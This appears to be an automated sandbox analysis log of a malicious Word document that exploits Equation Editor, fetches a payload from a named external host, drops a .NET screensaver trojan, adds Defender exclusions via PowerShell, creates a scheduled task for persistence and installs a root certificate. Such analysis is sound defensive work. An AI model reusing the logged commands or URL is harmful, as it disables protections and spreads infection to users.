                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.cs | Security API names: _0020.AddAccessRule
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, FUjasOohxIjsRf91GS.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, FUjasOohxIjsRf91GS.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, FUjasOohxIjsRf91GS.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: taskeng.exe, 00000015.00000002.663024979.0000000001DAB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .VBp/
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winDOC@25/31@68/10
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$der072724.docx.doc
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Mutant created: NULL
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Mutant created: \Sessions\1\BaseNamedObjects\eHfEjmAxzKFnFihZXpoZa
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR7C40.tmp
                Source: order072724.docx.doc | OLE indicator, Word Document stream: true
                Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.dr | OLE document summary: title field not present or empty
                Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.dr | OLE document summary: author field not present or empty
                Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.dr | OLE document summary: edited time not present or 0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................n.........................s............H...............H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X...............~o.........................s....................l.......H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................o.........................s............H...............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....x.......X................o.........................s............H...............H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................o.........................s............H...............H...............
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................|.4.........E.R.R.O.R.:. ...........,................^......................................(.'.......................4.....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................|.4.........E.R.R.O.(.P.............,................^..............................................j.................4.....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: order072724.docx.doc | ReversingLabs: Detection: 42%
                Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
                Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {52F5B264-C702-43C6-8445-EB0747C55549} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\gRpkBp.exe C:\Users\user\AppData\Roaming\gRpkBp.exe
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp"
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Process created: C:\Users\user\AppData\Roaming\gRpkBp.exe "C:\Users\user\AppData\Roaming\gRpkBp.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: credssp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ncrypt.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: bcrypt.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: ktmw32.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: webio.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: credssp.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: rpcrtremote.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr | Section loaded: gpapi.dll
                Source: C:\Windows\System32\taskeng.exe | Section loaded: ktmw32.dll
                Source: C:\Windows\System32\taskeng.exe | Section loaded: wevtapi.dll
                Source: C:\Windows\System32\taskeng.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\taskeng.exe | Section loaded: rpcrtremote.dll
                Source: C:\Windows\System32\taskeng.exe | Section loaded: xmllite.dll
                Source: C:\Windows\System32\taskeng.exe | Section loaded: dwmapi.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: ktmw32.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: webio.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: credssp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: rpcrtremote.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                Source: order072724.docx.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\order072724.docx.doc
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: order072724.docx.doc Initial sample: OLE zip file path = word/_rels/settings.xml.rels
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: lxqb.pdbSHA256 source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr
                Source: Binary string: lxqb.pdb source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr
                Source: order072724.docx.doc Initial sample: OLE indicators vbamacros = False

                Data Obfuscation

                Source: swagodi[1].scr.9.dr, frmMain.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: swagodi78811.scr.9.dr, frmMain.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: gRpkBp.exe.10.dr, frmMain.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 10.2.swagodi78811.scr.620000.0.raw.unpack, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                Source: 10.2.swagodi78811.scr.620000.0.raw.unpack, PingPong.cs .Net Code: Justy
                Source: 10.2.swagodi78811.scr.2127a8c.3.raw.unpack, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                Source: 10.2.swagodi78811.scr.2127a8c.3.raw.unpack, PingPong.cs .Net Code: Justy
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.cs .Net Code: JKVNGoEM53 System.Reflection.Assembly.Load(byte[])
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.cs .Net Code: JKVNGoEM53 System.Reflection.Assembly.Load(byte[])
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.cs .Net Code: JKVNGoEM53 System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0055C152 pushad ; retn 0055h 9_2_0055C209
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00558F60 push eax; retf 9_2_00558F61
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_005501F4 push eax; retf 9_2_005501F5
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Code function: 20_2_0020D6DC pushad ; iretd 20_2_0020D6E1
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe Code function: 22_2_0025BEF0 push esp; iretd 22_2_0025BEF5
                Source: swagodi[1].scr.9.dr Static PE information: section name: .text entropy: 7.981247900601898
                Source: swagodi78811.scr.9.dr Static PE information: section name: .text entropy: 7.981247900601898
                Source: gRpkBp.exe.10.dr Static PE information: section name: .text entropy: 7.981247900601898
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, 10.2.swagodi78811.scr.4630000.8.raw.unpack: High entropy of concatenated method names in the decompiled .cs classes

                Persistence and Installation Behavior

                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\meridianresourcellc.top@SSL\DavWWWRoot
                Source: settings.xml.rels Extracted files from sample: https://meridianresourcellc.top/swagodi.doc
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\swagodi78811.scr
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: swagodi[1].doc.0.dr
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: 9F4A4ED3.doc.0.dr
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr File created: C:\Users\user\AppData\Roaming\gRpkBp.exe

                Boot Survival

                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
